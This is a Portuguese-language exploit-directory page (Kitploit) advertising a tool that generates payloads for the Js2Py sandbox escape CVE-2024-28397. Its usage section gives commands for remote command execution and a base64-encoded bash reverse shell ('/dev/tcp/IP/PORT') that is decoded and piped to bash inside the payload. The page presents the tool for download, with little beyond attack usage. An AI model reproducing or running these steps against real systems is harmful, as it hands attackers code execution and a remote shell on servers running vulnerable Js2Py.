Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-28397-Js2Py-RCE — Gera payloads JavaScript para explorar o escape de sandbox do Js2Py (CVE-2024-28397), permitindo execução remota de comandos e shells reversos por meio da exposição de internos do Python. | Kitploit
Ferramentas/GitHubGitHub/y0naldez/cve-2024-28397-js2py-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleGeração de Shellcode
GitHuby0naldez/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Gera payloads JavaScript para explorar o escape de sandbox do Js2Py (CVE-2024-28397), permitindo execução remota de comandos e shells reversos por meio da exposição de internos do Python.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 3 mesesAinda não revisado

CVE-2024-28397 - Gerador de Payload para Escape de Sandbox do Js2Py

Este script gera um payload JavaScript que pode ser avaliado pelo Js2Py em ambientes vulneráveis onde os internals do Python são expostos através de wrappers de objetos.

Uso

Execução básica de comando:

root@kitploit:~
python3 cve-2024-28397.py -c "id"

Gere um payload compacto de uma linha:

root@kitploit:~
python3 cve-2024-28397.py -c "whoami" --compact

Reverse Shell com Base64

Gere o payload Base64:

root@kitploit:~
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0

Gere o payload Js2Py:

root@kitploit:~
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact

Substitua BASE64_OUTPUT pela string Base64 gerada no primeiro passo.

Baixar ferramenta